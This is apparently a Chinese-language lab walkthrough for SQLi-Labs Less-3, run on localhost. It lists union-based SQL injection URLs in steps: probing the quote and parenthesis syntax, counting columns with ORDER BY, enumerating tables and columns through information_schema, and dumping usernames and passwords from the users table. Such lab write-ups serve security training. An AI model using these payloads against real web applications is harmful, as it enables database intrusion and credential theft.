1. 通过构造id=1’ 和id=1’) 和id=1’)–+确定存在注入
可知原始url为 id=(‘1’)


2.使用order by 语句猜字段数

http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 4 --+
http://127.0.0.1/sqlilabs/Less-3/?id=1') order by 3 --+

3. 使用联合查询union select

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,3 --+
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,database(),version() --+

4. 查询当前库的所有表

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

5.查询某表的所有列名

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+

6. 获取账号密码

http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users --+```
http://127.0.0.1/sqlilabs/Less-3/?id=-1') union select 1,username,password from users limit 0,1 --+